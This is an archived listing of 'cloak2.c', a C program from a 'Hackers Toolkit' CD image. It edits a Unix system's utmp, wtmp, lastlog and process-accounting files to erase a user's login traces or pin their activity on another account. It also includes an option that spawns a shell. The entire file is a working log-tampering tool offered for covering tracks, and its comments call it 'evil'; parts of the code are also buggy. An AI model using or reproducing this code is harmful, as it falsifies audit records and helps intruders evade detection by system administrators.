home *** CD-ROM | disk | FTP | other *** search
/ Hackers Toolkit 2.0 / Hackers_Toolkit_v2.0.iso / HTML / archive / Unix / c-src / cloak2.c < prev    next >
Encoding:
C/C++ Source or Header  |  1999-11-04  |  10.7 KB  |  389 lines
  1. /*
  2.  *      C L O A K
  3.  *
  4.  *      Wrap yourself in a cloak of darkness (heh heh heh).
  5.  *
  6.  *      Michael S. Baldwin,  Matthew Diaz  1982
  7.  *
  8.  *      Marcus J. Ranum - 1983 - complete re-write and munging
  9.  *      added more options, and all kinds of evil - including the
  10.  *      ability to vanish from wtmp and acct as well as utmp. Added more
  11.  *      error checking and useful command syntax. Now you can attribute
  12.  *      all *YOUR* CPU usage to others when playing hack !!!
  13.  *
  14.  */
  15.  
  16.  
  17. #include <stdio.h>
  18. #include <sys/types.h>
  19. #include <utmp.h>
  20. #include <pwd.h>
  21. #include <lastlog.h>
  22. #include <sys/file.h>
  23. #include <sys/acct.h>
  24.  
  25. /* set these guys. If you're sysV a port should be easy */
  26. #define UTMP    "/etc/utmp"
  27. #define WTMP    "/usr/adm/wtmp"
  28. #define LAST    "/usr/adm/lastlog"
  29. #define ACCT    "/usr/adm/acct"
  30.  
  31.  
  32. main(ac,av)
  33. int     ac;
  34. char    *av[];
  35. {
  36.         char    *tp     = "";
  37.         char    *un     = "";
  38.         char    *hn     = "";
  39.         char    *pn     = "";
  40.         long    newt    = 0L;
  41.         int     wflg    = 0;
  42.         int     aflg    = 0;
  43.         int     refs    = 1;
  44.         int     x;              /* klunch */
  45.         char    *p;
  46.         extern  char    *index();
  47.         extern  time_t  time();
  48.  
  49.         for(x = 1; x < ac; x++) {
  50.                 if(av[x][0] == '-')
  51.                         switch(av[x][1]) {
  52.             case 'u':       /* username to be :-) */
  53.                                         if((x + 1) < ac)
  54.                                                 un = av[++x];
  55.                                         break;
  56.  
  57.                       case 't':       /* tty slot to be on :-) */
  58.                                         if((x + 1) < ac)
  59.                                                 tp = av[++x];
  60.                                         break;
  61.  
  62.                       case 'h':       /* host name to be on :-) */
  63.                                         if((x + 1) < ac)
  64.                                                 hn = av[++x];
  65.                                         break;
  66.  
  67.                       case 'r':       /* # of refs to zap :-) */
  68.                                         if((x + 1) < ac)
  69.                                                 refs = atoi(av[++x]);
  70.                                         break;
  71.  
  72.                       case 's':
  73.                                         execl("/bin/sh","sh",0);
  74.                                         perror("exec");
  75.                                         exit(1);
  76.  
  77.                       case 'w':       /* vanish from wtmp, too */
  78.                                         wflg++;
  79.                                         break;
  80.  
  81.                       case 'a':       /* vanish from acct, too */
  82.                                         aflg++;
  83.                                         break;
  84.  
  85.                       case 'p':       /* specific program for acct */
  86.                                         if((x + 1) < ac)
  87.                                                 pn = av[++x];
  88.                                         break;
  89.  
  90.                       case 'l':       /* log on time */
  91.                                         if((x + 1) >= ac)
  92.                                                 break;
  93.                                         newt = atoi(p = av[++x]);
  94.                                         if(p = index(p,':'))  {
  95.                                                 newt *= 60;
  96.                                                 newt += ((newt > 0) ? 1 : -1) *
  97. atoi(++p);
  98.                           }
  99.                                         newt *= 60;
  100.                                         newt += time((long *)0L);
  101.                                         break;
  102.  
  103.                       default:
  104.                                         exit(usage());
  105.                       }
  106.  
  107.           }
  108.  
  109.         if(wflg && wtmpzap(tp,un,hn,newt,refs))
  110.                 perror(av[0]);
  111.  
  112.         if(aflg && acctzap(un,pn))
  113.                 perror(av[0]);
  114.  
  115.         if(utmpzap(tp,un,hn,newt)) {
  116.                 perror(av[0]);
  117.                 exit(1);
  118.           }
  119.  
  120.         if(lastzap(tp,un,hn,newt)) {
  121.                 perror(av[0]);
  122.                 exit(1);
  123.           }
  124.  
  125.         exit(0);
  126.       }
  127.  
  128. utmpzap(tt,un,hn,tim)
  129. char    *tt;
  130. char    *un;
  131. char    *hn;
  132. long    tim;
  133. {
  134.         int     fd;
  135.         int     slot;
  136.         struct  utmp    ubuf;
  137.         extern  time_t  time();
  138.         extern  char    *strncpy();
  139.         extern  long    lseek();
  140.  
  141.         if((slot = ttyslot()) == 0) {
  142.                 (void)fprintf(stderr,"No tty slot");
  143.                 return(-1);
  144.           }
  145.  
  146.         if((fd = open(UTMP,O_RDWR)) == -1 )
  147.                 return(-1);
  148.  
  149.         if(lseek(fd,(long)(slot * sizeof(ubuf)),0) < 0) {
  150.                 (void)close(fd);
  151.                 return(-1);
  152.           }
  153.  
  154.         if(read(fd,(char *)&ubuf,sizeof(ubuf)) != sizeof(ubuf)) {
  155.                 (void)close(fd);
  156.                 return(-1);
  157.           }
  158.  
  159.         if(tim)
  160.                 ubuf.ut_time = tim;
  161.         else
  162.                 ubuf.ut_time = time((long *)0L);
  163.  
  164.         (void)strncpy(ubuf.ut_name,un,sizeof(ubuf.ut_name));
  165.  
  166.         if(!tt[0] == '\0')
  167.                 (void)strncpy(ubuf.ut_line,tt,sizeof(ubuf.ut_line));
  168.                 (void)strncpy(ubuf.ut_host,hn,sizeof(ubuf.ut_host));
  169.  
  170.         if(lseek(fd,(long)(-sizeof(ubuf)), 1) < 0) {
  171.                 (void)close(fd);
  172.                 return(-1);
  173.           }
  174.  
  175.         if(write(fd,(char *)&ubuf,sizeof(ubuf)) != sizeof(ubuf)) {
  176.                 (void)close(fd);
  177.                 return(-1);
  178.           }
  179.  
  180.         return(close(fd));
  181.       }
  182.  
  183. wtmpzap(tt,un,hn,tim,refs)
  184. char    *tt;
  185. char    *un;
  186. char    *hn;
  187. long    tim;
  188. int     refs;
  189. {
  190.         int     fd;
  191.         char    *p;
  192.         char    tbuf[40];
  193.         struct  utmp    ubuf;
  194.         extern  char    *strncpy();
  195.         extern  char    *strcpy();
  196.         extern  char    *rindex();
  197.         extern  char    *ttyname();
  198.         extern  long    lseek();
  199.         extern  time_t  time();
  200.  
  201.         if((p = ttyname(0)) != NULL)
  202.                 (void)strcpy(tbuf,p);
  203.         else
  204.                 return(0);
  205.  
  206.         /* figure out our device name */
  207.         p = rindex(tbuf,'/');
  208.         if(p == NULL)
  209.                 p = tbuf;
  210.         else
  211.                 p++;
  212.  
  213.  
  214.         if((fd = open(WTMP,O_RDWR)) == -1 )
  215.                 return(-1);
  216.  
  217.         if(lseek(fd,0L,2) < 0)
  218.                 return(-1);
  219.  
  220.  
  221.         /* this is gross, but I haven't a better idea how it can */
  222.         /* be done - so who cares ? */
  223.  
  224.         while(refs) {
  225.                 if((lseek(fd,(long)(-sizeof(ubuf)),1)) < 0) {
  226.                         (void)close(fd);
  227.                         return(0);
  228.               }
  229.  
  230.                 if(read(fd,(char *)&ubuf,sizeof(ubuf)) != sizeof(ubuf)) {
  231.                         (void)close(fd);
  232.                         return(0);
  233.               }
  234.                 if(!strcmp(p,ubuf.ut_line)) {
  235.                         if(tim)
  236.                                 ubuf.ut_time = tim;
  237.                         else
  238.                                 ubuf.ut_time = time((long *)0L);
  239.  
  240.                         (void)strncpy(ubuf.ut_name,un,sizeof(ubuf.ut_name));
  241.                         (void)strncpy(ubuf.ut_host,hn,sizeof(ubuf.ut_host));
  242.  
  243.                         if(!tt[0] == '\0')
  244.  
  245. (void)strncpy(ubuf.ut_line,tt,sizeof(ubuf.ut_line));
  246.  
  247.                         if(lseek(fd,(long)(-sizeof(ubuf)),1) < 0) {
  248.                                 (void)close(fd);
  249.                                 return(0);
  250.                   }
  251.  
  252.                         if(write(fd,(char *)&ubuf,sizeof(ubuf)) !=
  253. sizeof(ubuf)){
  254.                                 (void)close(fd);
  255.                                 return(0);
  256.                   }
  257.  
  258.                         if(lseek(fd,(long)(-sizeof(ubuf)),1) < 0) {
  259.                                 (void)close(fd);
  260.                                 return(0);
  261.                   }
  262.  
  263.                         refs--;
  264.    }
  265.  
  266.                 if(lseek(fd,(long)(-sizeof(ubuf)),1) < 0) {
  267.                         (void)close(fd);
  268.                         return(0);
  269.    }
  270.  
  271.    }
  272.  
  273.         return(close(fd));
  274.    }
  275.  
  276. acctzap(un,pn)
  277. char    *un;
  278. char    *pn;
  279. {
  280.         int     fd;
  281.         int     faku =0;
  282.         int     realu;
  283.         struct  acct    actbuf;
  284.         struct  passwd  *pwt;
  285.         extern  struct  passwd  *getpwnam();
  286.  
  287.         if((fd = open(ACCT,O_RDWR)) == -1 )
  288.                 return(-1);
  289.  
  290.         realu = getuid();
  291.  
  292.         if(un[0] != '\0' && ((pwt = getpwnam(un)) != NULL))
  293.                 faku = pwt->pw_uid;
  294.  
  295.         while(1) {
  296.                 if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
  297.                         (void)close(fd);
  298.                         return(0);
  299.               }
  300.  
  301.                 if(realu == actbuf.ac_uid) {
  302.  
  303.                         /* only zap a specific program to user */
  304.                         if(pn[0] != '\0' && strcmp(pn,actbuf.ac_comm))
  305.                                 continue;
  306.  
  307.                         actbuf.ac_uid = faku;
  308.                         actbuf.ac_flag &= ~ASU;
  309.                         if(lseek(fd,(long)(-sizeof(actbuf)),1) < 0) {
  310.                                 (void)close(fd);
  311.                                 return(0);
  312.                   }
  313.  
  314.                         if(write(fd,(char *)&actbuf,sizeof(actbuf)) !=
  315. sizeof(actbuf)){
  316.                                 (void)close(fd);
  317.                                 return(0);
  318.                   }
  319.               }
  320.           }
  321.       }
  322.  
  323. usage()
  324. {
  325. #ifdef USAGE
  326.         (void)fprintf(stderr,"usage: cloak <options>\n");
  327.         (void)fprintf(stderr,"options are:\t-l <+->hh:mm (login time)\n");
  328.         (void)fprintf(stderr,"\t\t-u username\t\t\t-t ttyname\n");
  329.         (void)fprintf(stderr,"\t\t-w (clobber wtmp)\t\t-r #of refs to
  330. clobber\n");
  331.         (void)fprintf(stderr,"\t\t-h host\t\t-a (clobber accounting)\n");
  332.         (void)fprintf(stderr,"\t\t-p program (attribute only program to
  333. acct)\n");
  334.         (void)fprintf(stderr,"(no args causes a simple vanishing act)\n");
  335. #endif
  336.         return(1);
  337.       }
  338.  
  339. lastzap(tt,un,hn,tim)
  340. char    *tt;
  341. char    *un;
  342. char    *hn;
  343. long    tim;
  344. {
  345.         int     fd;
  346.         int     uid;
  347.         struct  lastlog lbuf;
  348.         extern  time_t  time();
  349.         extern  char    *strncpy();
  350.         extern  long    lseek();
  351.  
  352.         uid = getuid();
  353.  
  354.         if((fd = open(LAST,O_RDWR)) == -1 )
  355.                 return(-1);
  356.  
  357.         if(lseek(fd,(long)(uid * sizeof(lbuf)),0) < 0) {
  358.                 (void)close(fd);
  359.                 return(-1);
  360.           }
  361.  
  362.         if(read(fd,(char *)&lbuf,sizeof(lbuf)) != sizeof(lbuf)) {
  363.                 (void)close(fd);
  364.                 return(-1);
  365.           }
  366.  
  367.         if(tim)
  368.                 lbuf.ll_time = tim;
  369.         else
  370.                 lbuf.ll_time = time((long *)0L);
  371.  
  372.         if(!tt[0] == '\0')
  373.                 (void)strncpy(lbuf.ll_line,tt,sizeof(lbuf.ll_line));
  374.         (void)strncpy(lbuf.ll_host,hn,sizeof(lbuf.ll_host));
  375.  
  376.         if(lseek(fd,(long)(-sizeof(lbuf)), 1) < 0) {
  377.                 (void)close(fd);
  378.                 return(-1);
  379.           }
  380.  
  381.         if(write(fd,(char *)&lbuf,sizeof(lbuf)) != sizeof(lbuf)) {
  382.                 (void)close(fd);
  383.                 return(-1);
  384.           }
  385.  
  386.         return(close(fd));
  387.       }
  388. }
  389.